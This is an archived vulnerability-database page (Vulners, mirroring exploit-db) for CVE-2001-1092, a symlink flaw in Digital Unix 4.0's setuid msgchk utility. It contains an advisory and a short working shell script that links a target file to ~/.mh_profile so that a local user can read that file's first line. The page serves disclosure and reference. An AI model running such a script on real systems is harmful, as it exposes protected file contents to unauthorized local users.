Lucene search
+L

Digital Unix 4.0 - MSGCHK MH_PROFILE Symbolic Link

🗓️ 10 Sep 2001 00:00:00Reported by seoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

msgchk utility in Digital Unix 4.0 allows information disclosure via symbolic links to files.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2001-1092
15 Mar 200205:00
cve
cvelist
Cvelist
CVE-2001-1092
15 Mar 200205:00
cvelist
euvd
EUVD
EUVD-2001-1073
7 Oct 202500:30
euvd
nvd
NVD
CVE-2001-1092
10 Sep 200104:00
nvd
cert
CERT
Digital Unix msgchk vulnerable to file contents disclosure via symlink redirection of profile
15 Nov 200100:00
cert
source: https://www.securityfocus.com/bid/3320/info

The msgchk utility under certain versions of Digital Unix contains an information disclosure vulnerability which could yield root privilege.

Because msgchk fails to check file permissions before opening user configuration files in the user's home directory, a symbolic link to a target file can permit a local user to read the first line of data contained in any file readable by the msgchk user. Where msgchk is run setuid root, this allows limited information to be read from any file on the host.

++ msgchkx.sh
#!/bin/sh
# truefinder, [email protected]
# msgchk file read vulnerability

if [ ! -f $1 ]
then
	echo "usage : $0 <file path>"
fi

cd ~
ln -sf $1 ~/.mh_profile
/usr/bin/mh/msgchk

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.01107
27